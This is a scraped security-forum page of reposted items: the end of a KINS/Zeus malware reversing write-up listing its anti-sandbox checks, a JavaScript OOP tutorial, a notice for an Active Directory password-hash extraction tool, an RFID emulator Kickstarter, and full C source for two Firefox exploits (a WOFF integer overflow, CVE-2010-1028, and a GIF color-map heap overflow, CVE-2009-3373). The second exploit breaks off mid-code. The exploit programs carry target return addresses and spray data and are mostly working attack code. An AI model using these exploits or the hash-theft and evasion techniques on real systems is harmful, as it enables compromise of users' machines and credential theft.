obtained by GetTickCount and the previous tick count value. crc32Initialized is true if crc32 has been initialized, false otherwise. - Winsock initialization Another expected feature of the malicious program is the ability to communicate with the server. A malware should send something to the server, and to start this communication process it needs a call to a function like WSAStartup. The winsock part is all inside a single call instruction to WSAStartup. KINS and Zeus initiate a client-server communication in the same classical way. - initHandles, initUserData, initPaths The name of the 3 procedures used above are taken from Zeus_leaked_source_code, and I put them together because they initialize global variables only. The procedures are not so interesting per se.. To sum-up I can say that KINS creates a manual reset event, it gets the security information of a logon access (it saves two values: the length of the logon security identifier (SID) and an Id which is calculated by crc32(SID)), and it gets the full path for KINS executable. - initOsBasic The last fully copy&paste code contains Os based tasks. It starts determining whether KINS is running under WOW64 or not. The status is saved inside a boolean flag and after that it tries to add a new full access security descriptor. Once again it saves the result of the operation, it’s not a flag variable but a structure with information about the security descriptor. An empty structure means an error during the task. If everything goes fine, KINS produces a 16 bytes long identifiers based on the volume GUID path: 41D9C0 push 64h ; cchBufferLength 41D9C2 lea eax, [ebp+74h+szVolumeName] 41D9C5 push eax ; lpszVolumeName 41D9C6 lea eax, [ebp+74h+szVolumeMountPoint] 41D9CC push eax ; lpszVolumeMountPoint 41D9CD call edi ; GetVolumeNameForVolumeMountPointW 41D9CF test eax, eax ; check the result 41D9D1 jz short GetVolumeNameForVolumeMountPointW_FAILS 41D9D3 cmp [ebp+74h+sz], '{' ; a minor check over the obtained string 41D9D8 jnz short ERROR 41D9DA push [ebp+74h+pclsid] ; pclsid 41D9DD xor eax, eax 41D9DF mov [ebp+74h+var_68], ax ; str[38] = 0; 41D9E3 lea eax, [ebp+74h+sz] 41D9E6 push eax ; lpsz 41D9E7 call ds:CLSIDFromString ; ottiene: GetVolumeNameForVolumeMountPoint could fail, just in case the snippet above can be executed more than one time. The first lpszVolumeMountPoint value is obtained calling SHGetFolderPath. In case GetVolemeNameForVolumeMountPoint fails the new lpszVolumeMountPoint string is obtained cutting the last part of it (it uses PathRemoveFileSpec). I.e.: it tries “C:\WINDOWS\” and then with “C:\” only. From the organization of the code and the large variety of flags/variables used seems like there’s a big focus to the details. If something goes wrong, or if KINS thinks that it doesn’t have the right condition to run it stops running. I.e.: KINS uses a variable to store a value obtained from the combination of the Os version and the integrity level. If the value is out from a range of specific acceptable values the malware stops. That’s why Zeus was, from some points of views, a master-piece. Yes, I said Zeus and you know why. Copy&paste with minor changes It happens when the code structure of a procedure is the same of the original version but there are some changes or additions. It’s the case of the InitLoadModules function, basically it’s a sequence of DecryptString/GetProcAddress calls. The list of functions address to retrieve is slightly changed from Zeus. The new list is composed by: NtCreateThread, NtCreateUserProcess, NtQueryInformationProcess, NtQueryInformationThread, RtlUserThreadStart, NtMapViewOfSection, NtUnmapViewOfSection, NtSuspendProcess, NtResumeProcess, NtClose and LdrFindEntryForAddress. I don’t know if it’s a KINS addition or it’s taken from a Zeus new version. I’m not a security expert and I can’t access all the possible Zeus versions but it’s a doubt I have: KINS takes some concept from other Zeus versions (over the one I’m referring to, 2.0.8.9). Copy&paste from more recent Zeus version Here’s a practical example of my doubt, the anti check routine! As I said before KINS runs under particular conditions, and his continuation depends on the values returned by the 8 calls called here. Every call performs a specific check: - CheckForPopupKiller: look for “C:\popupkiller.exe” file, if it exists KINS aborts - CheckForExecuteExe: another unwanted file on the system is “C:\TOOLS\execute.exe” - CheckForSbieDll: it’s time for a dll check, it tries to load “SbieDll.dll” (Sandboxie related dll), it won’t that dll on the system - CheckMutexFrz_State: the mutex under the observation is Frz_State which is from Deep Freeze software - CheckForNPF_NdisWanIp: the network related tool check, KINS doesn’t want “\\.\NPF_NdisWanIp” on the system - CheckForVMWareRelatedFiles: VmWare is strictly prohibited: “\\.\HGFS” and “\\.\vmci” are the file to look for - CheckForVBoxGuest: even VirtualBox is prohibited (“\\.\VBoxGuest”) - CheckForSoftwareWINERegKey: check the existence of the key “Software\WINE” If one of the calls above fails KINS aborts his execution immediately. There’s no trace of this code inside Zeus_leaked_source_code but I read some articles on the net talking about this specific snippet. You can read something here Snippets based on Zeus with KINS specific features That’s the most interesting part of the malware Init, the place where something new join the party! In this part of the code the malware tries to create some Id values, they are based on the machine components and properties (computer name, version information, install date, GUID, physical memory and volume serial number). Zeus does the same but it uses a simple xor decryption, crc32 and Rc4 in his calculations. KINS substitutes everything with the use of his personal virtual machine combined to crc32, Rc4, Sha1 hash algorithm and some brain blasting calculation. I won’t go in details right here but if you need it drop me a mail and I’ll tell you more. Basically, the addition are strictly related to the use of the virtual machine only. I gave a description of the virtual machine here, but I didn’t talk about his usage inside the malware. The VM is called some times during the life time of the malware but every time the VM modifies DataBuffer in the same way (it means the algo produced by the VM is always the same). When the VM ends, a number of bytes from DataBuffer are taken for the specific usage; in this initialization process they are used as a key for Rc4 algo. Imho, it’s quite strange approach. I don’t know why you have to call the same algo a lot of times, especially when the result is always the same. Maybe it’s just a way to confuse the job of the reversers out there or maybe I’m missing something… Is KINS a new myth or is it just born from the leaked Zeus source code? Well, I’m not a security expert and I can’t say it for sure but judging from what I’ve seen so far I think that KINS is strongly based on Zeus_leaked_source_code, they have the same DNA! It’s the same concept of the real life, KINS has something completely new, but the core comes from the father, Zeus. Anyway, this is only an introduction to the DNA paternity test. Now I would like to know if we can apply the same concept to all the features of both malwares. Maybe soon, now it’s holiday time! Sursa: KINS malware: initialization and DNA paternity test | My infected computer
  8. JavaScript Object Oriented Programming(OOP) Tutorial Object Oriented Programming is one of the most famous way to do programming. Before OOPs there was only list of instructions execute one bye one. But in OOPs we will deal with Objects and how those objects t interact with one another. JavaScript supports Object Oriented Programming but not the same way as other OOP languages(c++,php,Java,etc.). The main difference between these language and JavaScript is, there is no Classes in JavaScript where the classes are very impotent to create objects. But there is a way we can simulate the Class concept in JavaScript. Another important difference is data hiding. There is no access specifiers like (public,private,protected) in JavaScript. Again we will simulate the concept using variable scope in functions. Object Oriented Programming Concepts 1)Object 2)Class 3)Constructor 4)Inheritance 5)Encapsulation 6)Abstraction 7)Polymorphism Preparing the work space Create a new file "oops.html" and write this code on it. We will write all our JavaScript code on this file. <html> <head> <title>JavaScript Object Oriented Programming(OOPs) Tutorial</title> </head> <body> <script type="text/javascript"> //Write your code here..... </script> </body> </html> 1)Object Any real time entity is consider as Object. Every Object will have some properties and functions. For example consider person as an object then he will have properties like name,age,etc. And functions as walk, talk, eat, think,etc. Now lets see how we create objects in JavaScript. There are so many ways we can create objects in JavaScript. Some of them are //1)Creating Object through literal var obj={}; //2)Creating with Object.create var obj= Object.create(null); //3)Creating using new keyword function Person(){} var obj=new Person(); We can use any of the above way to create Object. 2)Class As I said earlier there on classes in JavaScript. Because JavaScript is Prototype based language. But we can simulate the class concept using JavaScript functions. function Person(){ //Properties this.name="aravind"; this.age="23"; //functions this.sayHi=function(){ return this.name +" Says Hi"; } } //Creating person instance var p=new Person(); alert(p.sayHi()); 3)Constructor Actually Constructor is a concepts comes under Class concept. The constructor is used to assign values to the properties of the Class when creating object using new operator. In above code we have use name,age properties for Person class now will assign values while creating new objects for person class as below. function Person(name,age){ //Assigning values through constructor this.name=name; this.age=age; //functions this.sayHi=function(){ return this.name +" Says Hi"; } } //Creating person instance var p=new Person("aravind",23); alert(p.sayHi()); //Creating Second person instance var p=new Person("jon",23); alert(p.sayHi()); 4)Inheritance Inheritance is a concept of getting the properties and function of one class to other class is classed Inheritance. For example lets consider "Student" Class. Now the Student also have properties name,age. We already have this properties in Person class. So it's much better to acquiring the properties of the Person instead of re-creating those properties. Now lets see how we can do inheritance in JavaScript. function Student(){} //1)Prototype based Inhertance Student.prototype= new Person(); //2)Inhertance throught Object.create Student.prototype=Object.create(Person); var stobj=new Student(); alert(stobj.sayHi()); We can do inheritance in above two ways. 5)Encapsulation Before we learn Encapsulation and Abstraction first we need to know what is data hiding? and who can we achieve it in JavaScript. Date hiding means hiding the data form accessing it out side the scope. For example in Person class and we have Date of Birth(dob) properties and we want to hide it form out side. Let's see how can we do it. function Person(){ //this is private varibale var dob="8 June 2012"; //public properties and functions return{ age:"23", name:"aravind", getDob:function(){ return dob; } } } var pobj=new Person(); //this will get undefined //because it is private to Person console.log(pobj.dob); //Will get dob value we using public //funtion to get private data console.log(pobj.getDob()); Now Encapsulation Means wrapping up of public and private data into a single data unit is called Encapsulation. Above example is one best suites Encapsulation. 6)Abstraction Abstraction means hiding the inner implementation details and showing only outer details. To understand Abstraction we need to understand Abstract and Interface concepts from Java. But we don't have any direct Abstract or Interface in JS. Ok! now in-order to understand abstraction in JavaScript lets take a example form JavaScript library JQuery. In JQuery we will use $("#ele")to select select an element with id ele on a web page. Actually this code calls negative JavaScript code document.getElementById("ele");But we don't need to know that we can happy use the $("#ele") without knowing the inner details of the implementation. 7)Polymorphism The word Polymorphism in OOPs means having more than one form. In JavaScript a Object,Property,Method can have more than one form. Polymorphism is a very cool feature for dynamic binding or late binding. function Person(){ this.sayHI=function(){} }; //This will create Student Class function Student(){}; Student.prototype=new Person(); Student.prototype.sayHI=function(l){ return "Hi! I am a Student"; } //This will create Teacher Object function Teacher(){}; Teacher.prototype=new Person(); Teacher.prototype.sayHI=function(){ return "Hi! I am a Teacher"; } var sObj=new Student(); //This will check if the student //object is instance of Person or not //if not it won't execute our alert code. if (sObj instanceof Person) { alert("Hurry! JavaScript supports OOps"); } Conclusion JavaScript supports Object Oriented Programming(OOP)Concepts. But it may not be the direct way. We need to create some simulation for some concepts. 10 Aug 2013 by aravind buddha at 10:44 PM Sursa:JavaScript Object Oriented Programming(OOP) Tutorial : Techumber
  9. [h=1]Active Directory Password Hash Extraction[/h] Just added a tool for offline Active Directory password hash extraction. It has very basic functionality right now but much more is planned. Command line application that runs on Windows only at the moment. ntds_decode -s <FILE> -d <FILE> -m -i -s <FILE> : SYSTEM registry hive -d <FILE> : Active Directory database -m : Machines (omitted by default) -i : Inactive, Locked or Disabled accounts (omitted by default) The SYSTEM registry hive and Active Directory database are from a domain controller. These files are obviously locked so you need to backup using the Volume Shadow Copy Service. The output format is similar to pwdump and only runs on Windows at the moment. LM and NTLM hashes are extracted from active user accounts only. ntds_decode mounts the SYSTEM file so Administrator access is required on the computer you run it on. If you’re an experienced pen tester or Administrator that would like to test this tool, you can grab from here It’s advisable you don’t use the tool unless you know what you’re doing. Source isn’t provided at the moment because it’s too early to release. If you have questions about it, feel free to e-mail the address provided in README.txt Sursa: Active Directory Password Hash Extraction | Insecurety Research
  10. RFIDler - A Software Defined RFID Reader/Writer/Emulator RFIDler (RFID Low-frequency Emulater & Reader). An open platform RFID reader/writer/emulator that can operate in the 125-134 KHz range. Software Defined is the buzz-word in RF these days, and we use SDR (Software Defined Radio) in our work as reverse-engineers all the time, with great projects like HackRF and GNU Radio, etc. So when it came to looking at RFID for a recent engagement, we decided to see if we couldn't apply the same thinking to that technology. And guess what? Yes, you can! One of our team, Adam Laurie (aka Code Monkey), has spent many years playing with RFID, and is the author of RFIDIOt, the open-source RFID python software library, so is very familiar with the higher-level challenges associated with these devices. However, a complete understanding of what goes on 'under the hood' is harder to come by, and it was only when he teamed up with Chip Monkey, Zac Franken, who has been hardware hacking and pulling things to bits (and putting them back together so they do something much more fun) since he was big enough to hold a screwdriver, that the full picture started to emerge... The Goal To produce a tool for Low Frequency (125-134Khz) RFID research projects, as well as a cut-down (Lite) version that can be embedded into your own hardware projects. The fully featured version we hope to bring in for around £30.00, and the Lite version for under £20.00. Features We have written extensive firmware which includes a user interface and an API to allow easy use of the system and to allow you to explore, read and emulate a wide range of low frequency RFID tags. Utilise ANY modulation scheme, including bi-directional protocols Write data to tag Read data from tag Emulate tag Sniff conversations between external reader & tag Provide raw as well as decoded data Built-in antenna External antenna connection USB power and user interface TTL interface GPIO interface JTAG interface for programming USB Bootloader for easy firmware updating External CLOCK interface if not using processor External power connector if not using USB The hardware gives you the capability to read/write/emulate more or less any LF tag, but we've also taken the hard work out of most of them by implementing all the tag types we can find in the public domain. These include: EM4102 / Unique Hitag 1/2/S FDX-B (ISO 11784/5 Animal Standard) Q5 T55xx Indala Noralsy HID Prox NXP PCF7931 Texas Instruments VeriChip FlexPass Firmware We have working firmware that proves the concept, and we will continue to develop the code to provide both command line interface and API for end-user applications. This will be posted in a github repository, here: https://github.com/ApertureLabsLtd/RFIDler Hardware The three devices we will produce are: RFIDler-LF-Nekkid - The bare naked circuit board with built-in antenna, ready for you to populate the electronic components yourself. RFIDler-LF-Lite - This is the board with only the low-level RFID communication components, to allow you to incorporate it into your own projects (e.g. controlling it with Arduino, Rasperry-pi, Beagle-Bone etc.), providing GPIO, power and clock interfaces only. Firmware can be ported from (and/or contributed to) the RFIDler repository, or write your own from scratch. RFIDler-LF-Standard - This is the fully populated Low Frequency (125/134KHz) board with on-board processor that can be used as a stand-alone device for research and in-the-field testing etc., providing TTL and USB serial command line and API interfaces as well as raw GPIO, clock and power. Your pledges will help us get this from working prototype to final production run, and incorporate where possible any cool ideas/features that we hadn't thought of, and bring Software Defined RFID to the masses! The challenges we have left to complete are: Processor selection - we've used the Pic32 as a proof-of-concept chip, but there may be others better suited to this kind of application. We will research and test 2 or 3 other chips before making a final decision. Coil design - coils are almost as mysterious as RFID itself, so we need to try various designs to see which on-board and external coils give us the best performance across the target frequency ranges. Final Board Layout - Layout the final boards and send to manufacturing. Further Details Here is Adam's blog entry on the subject: Obviously a Major Malfunction...: RFIDler - An open source Software Defined RFID Reader/Writer/Emulator And here is the prototype: And here we are reading an Indala PSK tag: The logic analyser trace shows that RFIDler is pulsing on the PSK Reader line whenever there is a phase change on the analogue line (the small green pulses are negative, and the large ones positive). All our software has to do is detect those pulses at each bit period, and clock out the data. The 'Bitstream' line shows the software bit value detection in action, as it's being driven by the UBW32 board. The other nice thing we can do in software is monitor the quality of the read: the width of the reader pulse will narrow as the coil goes in and out of the field, and the coils 'de-couple', so we can flag a read error when the pulse gets too narrow. This is important when you're looking at unknown tag types: the manufacturer may have a built-in parity or other data checks so their native reader knows when it's getting a good read, but we don't have the knowledge of the relevant algorithms, so cannot do the same. With this technique, we can easily filter out bad reads that will give us corrupt data. Of course, as well as reading a tag, we want to be the tag, so here we are emulating PSK: and we could do that for any bitrate, modulation scheme or data pattern (within reason), as well as have 2-way conversations (e.g. Hitag2). So that brings us to where we are now... Timeframe We've allowed the following timeframes for each stage: Project starts in October (assuming we get funded! Full circuit design and CPU selection: 4 weeks, taking us to November. Beta test phase: 6 weeks up to mid-December, then it's the Christmas & New Year break... Final production run: 4 weeks starting in January, so we should be done by February. We all know that in real life timescales slip, but since the underlying hardware is already proven in our prototype, and all we're really doing now is fine-tuning and incorporating feedback from the beta test, we expect this to be a fairly quick project! Risks and challenges Learn about accountability on Kickstarter We have great facilities in-house for prototyping electronic circuits, and so we expect the main challenges to have been worked out before we go to the trouble and expense of outside manufacturing. However, we also have a great relationship with our fab company, who we have used for several years on many successful projects, so we know they have the resources to get the job done. We look forward to working with you! FAQ Have a question? If the info above doesn't help, you can ask the project creator directly. Sursa: RFIDler - A Software Defined RFID Reader/Writer/Emulator by Aperture Labs Ltd. — Kickstarter
  11. [h=1]Mozilla Firefox 3.6 - Integer Overflow Exploit[/h] #include <stdio.h>#include <stdlib.h> #include <string.h> #include <zlib.h> /* x90c WOFF 1day exploit (MFSA2010-08 WOFF Heap Corruption due to Integer Overflow 1day exploit) CVE-ID: CVE-2010-1028 Full Exploit: http:/www.exploit-db.com/sploits/27698.tgz Affacted Products: - Mozilla Firefox 3.6 ( Gecko 1.9.2 ) - Mozilla Firefox 3.6 Beta1, 3, 4, 5 ( Beta2 ko not released ) - Mozilla Firefox 3.6 RC1, RC2 Fixed in: - Mozilla Firefox 3.6.2 ( after 3.6 version this bug fixed ) security bug credit: Evgeny Legerov < intevydis.com > Timeline: 2010.02.01 - Evengy Legerov Initial discovered and shiped it into "Immunity 3rd Party Product VulnDisco 9.0" https://forum.immunityinc.com/board/thread/1161/vulndisco-9-0/ 2010.02.18 - without reporter, it self analyzed and contact to mozilla and secunia before advisory reporting http://secunia.com/advisories/38608 2010.03.19 - CVE registered http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1028 2010.03.22 - Mozilla advisory report http://www.mozilla.org/security/announce/2010/mfsa2010-08.html 2010.04.01 - x90c exploit (x90c.org) Compile: [root@centos5 woff]# gcc CVE-2010-1028_exploit.c -o CVE-2010-1028_exploit -lz rebel: greets to my old l33t hacker dude in sweden ... BSDaemon: and Invitation of l33t dude for exploit share #phrack@efnet, #social@overthewire x90c */ typedef unsigned int UInt32; typedef unsigned short UInt16; /* for above two types, some WOFF header struct uses big-endian byte order. */ typedef struct { UInt32 signature; UInt32 flavor; UInt32 length; UInt16 numTables; UInt16 reserved; UInt32 totalSfntSize; UInt16 majorVersion; UInt16 minorVersion; UInt32 metaOffset; UInt32 metaLength; UInt32 metaOrigLength; UInt32 privOffset; UInt32 privLength; } WOFF_HEADER; typedef struct { UInt32 tag; UInt32 offset; UInt32 compLength; UInt32 origLength; UInt32 origChecksum; } WOFF_DIRECTORY; #define FLAVOR_TRUETYPE_FONT 0x0001000 #define FLAVOR_CFF_FONT 0x4F54544F struct ff_version { int num; char *v_nm; unsigned long addr; }; struct ff_version plat[] = { { 0, "Win XP SP3 ko - FF 3.6", 0x004E18ED }, { 1, "Win XP SP3 ko - FF 3.6 Beta1", 0x004E17BD }, { 2, "Win XP SP3 ko - FF 3.6 Beta3", 0x004E193D }, { 3, "Win XP SP3 ko - FF 3.6 Beta4", 0x004E20FD }, { 4, "Win XP SP3 ko - FF 3.6 Beta5", 0x600A225D }, { 5, "Win XP SP3 ko - FF 3.6 RC1", 0x004E17BD }, { 6, "Win XP SP3 ko - FF 3.6 RC2", 0x004E18ED }, { 0x00, NULL, 0x0 } }; void usage(char *f_nm) { int i = 0; fprintf(stdout, "\n Usage: %s [Target ID]\n\n", f_nm); for(i = 0; plat.v_nm != NULL; i++) fprintf(stdout, "\t{%d} %s. \n", (plat.num), (plat.v_nm)); exit(-1); } int main(int argc, char *argv[]) { WOFF_HEADER woff_header; WOFF_DIRECTORY woff_dir[1]; FILE *fp; char dataBlock[1024]; char compressed_dataBlock[1024]; char de_buf[1024]; int total_bytes = 0, total_dataBlock = 0; unsigned long destLen = 1024; unsigned long de_Len = 1024; unsigned long i = 0; unsigned long addr_saved_ret_val = 0; int ret = 0; int n = 0; if(argc < 2) usage(argv[0]); n = atoi(argv[1]); if(n < 0 || n > 6) { fprintf(stderr, "\nTarget number range is 0-6!\n"); usage(argv[0]); } printf("\n#### x90c WOFF exploit ####\n"); printf("\nTarget: %d - %s\n\n", (plat[n].num), (plat[n].v_nm)); // WOFF HEADER woff_header.signature = 0x46464F77; // 'wOFF' ( L.E ) woff_header.flavor = FLAVOR_TRUETYPE_FONT; // sfnt version ( B.E ) woff_header.length = 0x00000000; // woff file total length ( B.E ) woff_header.numTables = 0x0100; // 0x1 - woff dir entry length ( B.E ) woff_header.reserved = 0x0000; // res bit ( all zero ) // totalSFntSize value will bypass validation condition after integer overflow woff_header.totalSfntSize = 0x1C000000; // 0x0000001C ( B.E ) woff_header.majorVersion = 0x0000; // major version woff_header.minorVersion = 0x0000; // minor version woff_header.metaOffset = 0x00000000; // meta data block offset ( not used ) woff_header.metaLength = 0x00000000; // meta data block length ( not used ) woff_header.metaOrigLength = 0x00000000; // meta data block before-compresed length ( not used ) woff_header.privOffset = 0x00000000; // Private data block offset ( not used ) woff_header.privLength = 0x00000000; // Private data block length woff_dir[0].tag = 0x54444245; // 'EBDT' ( B.E ) woff_dir[0].offset = 0x40000000; // 0x00000040 ( B.E ) woff_dir[0].compLength = 0x00000000; // ( B.E ) // to trigger field bit. // 0xFFFFFFF8-0xFFFFFFFF value to trigger integer overflow. // 1) calculation result is 0, it's bypass to sanityCheck() function // 2) passed very long length into zlib Decompressor, it's trigger memory corruption! // 0xFFFFFFFD-0xFFFFFFFF: bypass sanityCheck() // you can use only the value of 0xFFFFFFFF ( integer overflow!!! ) // you can't using other values to bypass validation condition woff_dir[0].origLength = 0xFFFFFFFF; // 0xFFFFFFFF ( B.E ) printf("WOFF_HEADER [ %d bytes ]\n", sizeof(WOFF_HEADER)); printf("WOFF_DIRECTORY [ %d bytes ]\n", sizeof(WOFF_DIRECTORY)); // to compress data block // [ 0x0c0c0c0c 0x0c0c0c0c 0x0c0c0c0c ... ] // ...JIT spray stuff... addr_saved_ret_val = plat[n].addr; addr_saved_ret_val += 0x8; // If add 8bytes it reduced reference error occurs for(i = 0; i < sizeof(dataBlock); i+=4) // 0x004E18F5 { dataBlock[i+0] = (addr_saved_ret_val & 0x000000ff); dataBlock[i+1] = (addr_saved_ret_val & 0x0000ff00) >> 8; dataBlock[i+2] = (addr_saved_ret_val & 0x00ff0000) >> 16; dataBlock[i+3] = (addr_saved_ret_val & 0xff000000) >> 24; } // compress dataBlock with zlib's compress() if(compress((Bytef *)compressed_dataBlock, (uLongf *)&destLen, (Bytef *)dataBlock, (uLong)(sizeof(dataBlock)) ) != Z_OK) { fprintf(stderr, "Zlib compress failed!\n"); exit(-1); } printf("\nZlib compress(dataBlock) ...\n"); printf("DataBlock [ %u bytes ]\n", sizeof(dataBlock)); printf("Compressed DataBlock [ %u bytes ]\n", destLen); printf("[ Z_OK ]\n\n"); total_bytes = sizeof(WOFF_HEADER) + sizeof(WOFF_DIRECTORY) + destLen; total_dataBlock = destLen; printf("Total WOFF File Size: %d bytes\n", total_bytes); // byte order change to total_bytes, total_dataBlock ( L.E into B.E ) total_bytes = ((total_bytes & 0xff000000) >> 24) | ((total_bytes & 0x00ff0000) >> 8) | ((total_bytes & 0x0000ff00) << 8) | ((total_bytes & 0x000000ff) << 24); woff_header.length = total_bytes; total_dataBlock = ((total_dataBlock & 0xff000000) >> 24) | ((total_dataBlock & 0x00ff0000) >> 8) | ((total_dataBlock & 0x0000ff00) << 8) | ((total_dataBlock & 0x000000ff) << 24); woff_dir[0].compLength = total_dataBlock; // create attack code data if((fp = fopen("s.woff", "wb")) < 0) { fprintf(stderr, "that file to create open failed\n"); exit(-2); } // setup WOFF data store fwrite(&woff_header, 1, sizeof(woff_header), fp); fwrite(&woff_dir[0], 1, sizeof(woff_dir[0]), fp); fwrite(&compressed_dataBlock, 1, destLen, fp); fclose(fp); // zlib extract test ret = uncompress(de_buf, &de_Len, compressed_dataBlock, destLen); if(ret != Z_OK) { switch(ret) { case Z_MEM_ERROR: printf("Z_MEM_ERROR\n"); break; case Z_BUF_ERROR: printf("Z_BUF_ERROR\n"); break; case Z_DATA_ERROR: printf("Z_DATA_ERROR\n"); break; } fprintf(stderr, "Zlib uncompress test failed!\n"); unlink("./s.woff"); exit(-3); } printf("\nZlib uncompress test(compressed_dataBlock) ...\n"); printf("[ Z_OK ]\n\n"); return 0; } /* eof */ Sursa: Mozilla Firefox 3.6 - Integer Overflow Exploit
  12. [h=1]Mozilla Firefox 3.5.4 - Local Color Map Exploit[/h] #include <stdio.h>#include <stdlib.h> /* x90c local color map 1day exploit CVE-2009-3373 Firefox local color map 1day exploit (MFSA 2009-56 Firefox local color map parsing heap overflow) Full Exploit: http://www.exploit-db.com/sploits/27699.tgz vulnerable: - Firefox 3.5.4 <= - Firefox 3.0.15 <= - SeaMonkey 2.0 <= x90c */ struct _IMAGE { char GCT_size; // global color map size char Background; // backcolor( select in global color map entry ) char default_pixel_ratio; // 00 char gct[4][3]; // 4 entries of global color map( 1bit/1pixel ) // char app_ext[19]; // application extension 19bytes ( to enable animation ) char gce[2]; // '!' GCE Label = F9 char ext_data; // 04 = 4 bytes of extension data char trans_color_ind; // use transparent color? ( 0/1 ) char ani_delay[2]; // 00 00 ( micro seconds delay in animation ) char trans; // color map entry to apply transparent color ( applied first image ) char terminator1; // 0x00 char image_desc; // ',' char NW_corner[4]; // 00 00 00 00 (0, 0) image put position char canvas_size[4]; // 03 00 05 00 ( 3x5 ) logical canvas size char local_colormap; // 80 use local color map? ( last bottom 3bits are bits per pixel) char lct[4][3]; // local color map ( table ) char LZW_min; // 02 ( LZW data length -1 ) char encoded_image_size;// 03 ( LZW data length ) char image_data[1]; // LZW encoded image data char terminator2; // 0x00 } IMAGE; struct _IMAGE1 { char image_desc; // ',' char NW_corner[4]; // 00 00 00 00 (0, 0) char canvas_size[4]; // 03 00 05 00 ( 3x5 ) char local_colormap; // 00 = no local color map char lct[7][3]; // local color map char lcta[1][2]; // char LZW_min; // 08 // char encoded_image_size; // 0B ( 11 bytes ) // char image_data[9]; // encoded image data //char terminator2; // 0x00 } IMAGE1; struct _GIF_HEADER { char MAGIC[6]; // GIF89a unsigned short canvas_width; // 03 00 unsigned short canvas_height; // 05 00 struct _IMAGE image; struct _IMAGE1 image1; // char trailler; // ; // GIF file trailer } GIF_HEADER; int main(int argc, char *argv[]) { struct _GIF_HEADER gif_header; int i = 0; // (1) first image frame to LZW data, proper dummy ( it's can't put graphic ) // char data[3] = "\x84\x8F\x59"; char data[3] = "\x00\x00\x00"; // (2) second image frame to LZW data, backcolor changed by reference local color map char data1[9] = "\x84\x8F\x59\x84\x8F\x59\x84\x8F\x59"; char app_ext[19] = "\x21\xFF\x0B\x4E\x45\x54\x53\x43\x41\x50\x45\x32\x2E\x30\x03\x01\x00\x00\x00"; // animation tag ( not use ) FILE *fp; memset(&gif_header, 0, sizeof(gif_header)); // MAGIC ( GIF87a ) last version - support alpha value(transparency) gif_header.MAGIC[0] = '\x47'; gif_header.MAGIC[1] = '\x49'; gif_header.MAGIC[2] = '\x46'; gif_header.MAGIC[3] = '\x38'; gif_header.MAGIC[4] = '\x39'; gif_header.MAGIC[5] = '\x61'; // LOGICAL CANVAS gif_header.canvas_width = 3; // global canvas width length gif_header.canvas_height = 5; // height length // GLOBAL HEADER ( included global header, if local color map exists, not used global color map ) gif_header.image.GCT_size = '\x81'; // 81 gif_header.image.Background = '\x00'; // global color table #2 ( black ) gif_header.image.default_pixel_ratio = '\x00'; // 00 ( Default pixel aspect ratio ) // gct ( [200][3] ) gif_header.image.gct[0][0] = '\x43'; gif_header.image.gct[0][1] = '\x43'; gif_header.image.gct[0][2] = '\x43'; gif_header.image.gct[1][0] = '\x43'; gif_header.image.gct[1][1] = '\x43'; gif_header.image.gct[1][2] = '\x43'; gif_header.image.gct[2][0] = '\x43'; gif_header.image.gct[2][1] = '\x43'; gif_header.image.gct[2][2] = '\x43'; gif_header.image.gct[3][0] = '\x43'; gif_header.image.gct[3][1] = '\x43'; gif_header.image.gct[3][2] = '\x43'; /* for(i = 0; i < 19; i++) { gif_header.image.app_ext = app_ext; }*/ gif_header.image.gce[0] = '!'; gif_header.image.gce[1] = '\xF9'; gif_header.image.ext_data = '\x04'; gif_header.image.trans_color_ind = '\x00'; // no use transparent color gif_header.image.ani_delay[0] = '\x00'; // C8 = 2 seconds delay ( animation ) gif_header.image.ani_delay[1] = '\x00'; gif_header.image.trans = '\x00'; // no use transparent color ( color map ) gif_header.image.terminator1 = '\x00'; // IMAGE Header gif_header.image.image_desc = ','; gif_header.image.NW_corner[0] = '\x00'; // 0,0 position gif_header.image.NW_corner[1] = '\x00'; gif_header.image.NW_corner[2] = '\x00'; gif_header.image.NW_corner[3] = '\x00'; gif_header.image.canvas_size[0] = '\x03'; // 3 x 5 canvas gif_header.image.canvas_size[1] = '\x00'; gif_header.image.canvas_size[2] = '\x05'; gif_header.image.canvas_size[3] = '\x00'; gif_header.image.local_colormap = 0x80; // use local color map // gif_header.image.local_colormap |= 0x40; // image formatted in Interlaced order //gif_header.image.local_colormap |= 0x4; // pixel of local color map //gif_header.image.local_colormap |= 0x2; // 2 bits. gif_header.image.local_colormap |= 0x1; // bits per pixel. ( black/white ) gif_header.image.lct[0][0] = '\x42'; // R ( red ) gif_header.image.lct[0][1] = '\x42'; gif_header.image.lct[0][2] = '\x42'; gif_header.image.lct[1][0] = '\x42'; gif_header.image.lct[1][1] = '\x42'; // G ( green ) gif_header.image.lct[1][2] = '\x42'; // b ( blue ) gif_header.image.lct[2][0] = '\x42'; gif_header.image.lct[2][1] = '\x42'; gif_header.image.lct[2][2] = '\x42'; gif_header.image.lct[3][0] = '\x42'; gif_header.image.lct[3][1] = '\x42'; gif_header.image.lct[3][2] = '\x42'; // RASTER DATA gif_header.image.LZW_min = '\x00'; // total encode data - 1 gif_header.image.encoded_image_size = '\x01'; // 255 bytes // encoded data for(i = 0; i < 1; i++) { gif_header.image.image_data = 0xFF; } // RASTER DATA EOF gif_header.image.terminator2 = '\x00'; // -------------------------------------------------- // ------------- IMAGE1 ----------------------------- gif_header.image1.image_desc = ','; gif_header.image1.NW_corner[0] = '\x00'; // (0, 0) gif_header.image1.NW_corner[1] = '\x00'; gif_header.image1.NW_corner[2] = '\x00'; gif_header.image1.NW_corner[3] = '\x00'; gif_header.image1.canvas_size[0] = '\x03'; // 3 x 5 gif_header.image1.canvas_size[1] = '\x00'; gif_header.image1.canvas_size[2] = '\x05'; gif_header.image1.canvas_size[3] = '\x00'; gif_header.image1.local_colormap = 0x80; // use local color map // gif_header.image1.local_colormap |= 0x40; // image formatted in Interlaced order //gif_header.image1.local_colormap |= 0x4; // pixel of local color map 4 pixel gif_header.image1.local_colormap |= 0x2; //gif_header.image1.local_colormap |= 0x1; // 1bit per pixel. // below values are will used as return addr for(i = 0; i < 7; i++) // second image frame's local color map entry length is 8 { gif_header.image1.lct[0] = '\x0c'; // (RET & 0x00FF0000) gif_header.image1.lct[1] = '\x0c'; // (RET & 0xFF00FF00) gif_header.image1.lct[2] = '\x0c'; // (RET & 0X000000FF) } gif_header.image1.lcta[0][0] = '\x0c'; gif_header.image1.lcta[0][1] = '\x0c'; //} // RASTER DATA //gif_header.image1.LZW_min = 0x00;//'\x05'; //gif_header.image1.encoded_image_size = 0x00;//'\x06';*/ // encoded data /* for(i = 0; i < 9; 